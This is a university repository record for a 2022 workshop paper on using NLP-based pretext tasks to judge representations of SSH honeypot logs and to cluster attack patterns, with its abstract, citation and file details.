Learning meaningful representations from network data is critical to ease the adoption of AI as a cornerstone to process network logs. Since a large portion of such data is textual, Natural Language Processing (NLP) appears as an obvious candidate to learn their representations. Indeed, the literature proposes impressive applications of NLP applied to textual network data. However, in the absence of labels, objectively evaluating the goodness of the learned representations is still an open problem. We call for a systematic adoption of domain-specific pretext tasks to select the best representation from network data. Relying on such tasks enables us to evaluate different representations on side machine learning problems and, ultimately, unveiling the best candidate representations for the more interesting downstream tasks for which labels are scarce or unavailable. We apply pretext tasks in the analysis of logs collected from SSH honeypots. Here, a cumbersome downstream task is to cluster events that exhibit a similar attack pattern. We propose the following pipeline: first, we represent the input data using a classic NLP-based approach. Then, we design pretext tasks to objectively evaluate the representation goodness and to select the best one. Finally, we use the best representation to solve the unsupervised task, which uncovers interesting behaviours and attack patterns. All in all, our proposal can be generalized to other text-based network logs beyond honeypots.
On using pretext tasks to learn representations from network logs / Boffa, M.; Vassio, L.; Mellia, M.; Drago, I.; Milan, G.; Houidi, Z. B.; Rossi, D.. - STAMPA. - (2022), pp. 21-26. (Intervento presentato al convegno NativeNi '22: 1st International Workshop on Native Network Intelligence tenutosi a Roma, Italy nel 9 December 2022) [10.1145/3565009.3569522].
On using pretext tasks to learn representations from network logs
Boffa M.;Vassio L.;Mellia M.;Drago I.;Milan G.;
2022
Abstract
Learning meaningful representations from network data is critical to ease the adoption of AI as a cornerstone to process network logs. Since a large portion of such data is textual, Natural Language Processing (NLP) appears as an obvious candidate to learn their representations. Indeed, the literature proposes impressive applications of NLP applied to textual network data. However, in the absence of labels, objectively evaluating the goodness of the learned representations is still an open problem. We call for a systematic adoption of domain-specific pretext tasks to select the best representation from network data. Relying on such tasks enables us to evaluate different representations on side machine learning problems and, ultimately, unveiling the best candidate representations for the more interesting downstream tasks for which labels are scarce or unavailable. We apply pretext tasks in the analysis of logs collected from SSH honeypots. Here, a cumbersome downstream task is to cluster events that exhibit a similar attack pattern. We propose the following pipeline: first, we represent the input data using a classic NLP-based approach. Then, we design pretext tasks to objectively evaluate the representation goodness and to select the best one. Finally, we use the best representation to solve the unsupervised task, which uncovers interesting behaviours and attack patterns. All in all, our proposal can be generalized to other text-based network logs beyond honeypots.File | Dimensione | Formato | |
---|---|---|---|
2022_pretext_NATIVENI_published.pdf
accesso aperto
Tipologia:
2a Post-print versione editoriale / Version of Record
Licenza:
PUBBLICO - Tutti i diritti riservati
Dimensione
1.17 MB
Formato
Adobe PDF
|
1.17 MB | Adobe PDF | Visualizza/Apri |
Pubblicazioni consigliate
I documenti in IRIS sono protetti da copyright e tutti i diritti sono riservati, salvo diversa indicazione.
https://hdl.handle.net/11583/2976474